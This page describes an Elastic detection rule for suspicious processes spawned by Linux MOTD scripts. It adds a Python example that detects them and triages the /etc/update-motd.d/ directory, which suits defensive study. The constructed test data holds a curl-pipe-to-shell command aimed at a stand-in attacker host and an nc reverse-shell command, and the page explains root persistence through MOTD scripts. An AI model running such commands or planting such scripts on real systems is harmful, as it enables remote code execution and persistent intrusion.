
Process Spawned from Message-of-the-Day (MOTD)

Elastic Detection Rules

Summary
This detection rule identifies potentially malicious processes spawned from Message-of-the-Day (MOTD) scripts on Linux systems. The MOTD is a configurable message shown to users when they log into a Linux server over SSH or a serial console. On Debian-based distributions such as Ubuntu, the pam_motd module builds this message dynamically by executing every script in '/etc/update-motd.d/' as root on each login. An attacker who can write to that directory therefore gains root-level persistence: a dropped or modified script runs its commands every time any user logs in, with no further interaction required. This rule uses EQL (Event Query Language) over process events to surface child processes of scripts in that directory that a benign banner script has no reason to launch; such executions deviate from normal behaviour and warrant investigation. The investigation guide walks through querying the file system for recently changed or unexpected scripts in '/etc/update-motd.d/' and reviewing the context of the flagged executions to confirm or rule out a compromise.
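The following is an added illustration and is not the rule's own EQL query or any Elastic code. It approximates the detection idea in plain Python over constructed ECS-style process events (field names follow ECS; the clause set, the list of flagged tools and the sample events are assumptions chosen for the example), and adds a small file-system triage helper of the kind the investigation guide describes: flag scripts in the MOTD directory that changed after a known-good baseline or that anyone can write to.

```python
"""Added example: MOTD child-process detection and a triage helper.

Not the Elastic rule's query. ECS field names are real; the matching
clauses, tool lists and sample events are assumptions for illustration.
"""
import fnmatch
import os
import stat
import tempfile
import time

# Assumed: the detection keys on a parent executable under this directory.
MOTD_PARENT_GLOB = "/etc/update-motd.d/*"
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "csh", "tcsh", "fish"}
# Assumed set of tools a cosmetic login banner has no reason to run.
NET_OR_INTERP = {"nc", "ncat", "netcat", "socat", "curl", "wget",
                 "python3", "perl", "php", "ruby"}


def is_suspicious_motd_child(event):
    """True when a process event looks like abuse of a MOTD script."""
    parent = event.get("process.parent.executable", "")
    if not fnmatch.fnmatch(parent, MOTD_PARENT_GLOB):
        return False
    name = event.get("process.name", "")
    args = event.get("process.args", [])
    if name in NET_OR_INTERP:
        return True
    # A shell started with -c from a MOTD script is an inline command,
    # which package-provided banner scripts do not normally use.
    return name in SHELLS and "-c" in args


def scan(events):
    """Run the check over a list of events; return the suspicious ones."""
    return [e for e in events if is_suspicious_motd_child(e)]


def triage_motd_dir(path, baseline_epoch):
    """Flag regular files changed after the baseline or world-writable."""
    findings = []
    for name in sorted(os.listdir(path)):
        st = os.stat(os.path.join(path, name))
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_mtime > baseline_epoch:
            findings.append((name, "modified after baseline"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((name, "world-writable"))
    return findings


def make_demo_motd_dir():
    """Build a throwaway stand-in for /etc/update-motd.d/ (constructed data).

    Returns (directory, baseline_epoch). One script predates the baseline
    and is owner-writable only; one is newer and world-writable.
    """
    d = tempfile.mkdtemp(prefix="motd-demo-")
    baseline = time.time() - 3600
    old = os.path.join(d, "00-header")
    with open(old, "w") as f:
        f.write("#!/bin/sh\nprintf 'Welcome\\n'\n")
    os.chmod(old, 0o755)
    os.utime(old, (baseline - 86400, baseline - 86400))
    new = os.path.join(d, "99-footer")
    with open(new, "w") as f:
        f.write("#!/bin/sh\nbash -c 'curl -s http://attacker.example/p | sh'\n")
    os.chmod(new, 0o777)  # mtime stays "now", i.e. after the baseline
    return d, baseline


# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {  # package script listing system info: benign
        "process.parent.executable": "/etc/update-motd.d/50-landscape-sysinfo",
        "process.name": "landscape-sysinfo",
        "process.args": ["landscape-sysinfo"], "user.name": "root"},
    {  # shell with -c, but parent is outside the MOTD directory: ignored
        "process.parent.executable": "/usr/bin/sudo",
        "process.name": "bash",
        "process.args": ["bash", "-c", "id"], "user.name": "root"},
    {  # inline command launched by a MOTD script: suspicious
        "process.parent.executable": "/etc/update-motd.d/99-footer",
        "process.name": "bash",
        "process.args": ["bash", "-c", "curl -s http://attacker.example/p | sh"],
        "user.name": "root"},
    {  # network tool launched straight from a MOTD script: suspicious
        "process.parent.executable": "/etc/update-motd.d/10-uname",
        "process.name": "nc",
        "process.args": ["nc", "-e", "/bin/sh", "203.0.113.5", "4444"],
        "user.name": "root"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("ALERT:", hit["process.parent.executable"], "->",
              " ".join(hit["process.args"]))
    demo_dir, base = make_demo_motd_dir()
    for name, reason in triage_motd_dir(demo_dir, base):
        print("TRIAGE:", name, reason)
```

Two of the four constructed events are flagged: the `bash -c` inline command and the direct `nc` launch. The benign `landscape-sysinfo` child and the `sudo`-spawned shell are left alone, which is the point of keying on the parent executable rather than on the child name alone. The triage helper reports `99-footer` twice (newer than the baseline and world-writable) and stays silent on `00-header`; on a real host the baseline would come from package metadata or a known-good snapshot rather than a fixed offset.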
Categories
  • Endpoint
  • Linux
Data Sources
  • Process
  • File
  • User Account
  • Application Log
ATT&CK Techniques
  • T1037 (Boot or Logon Initialization Scripts)
Created: 2023-02-28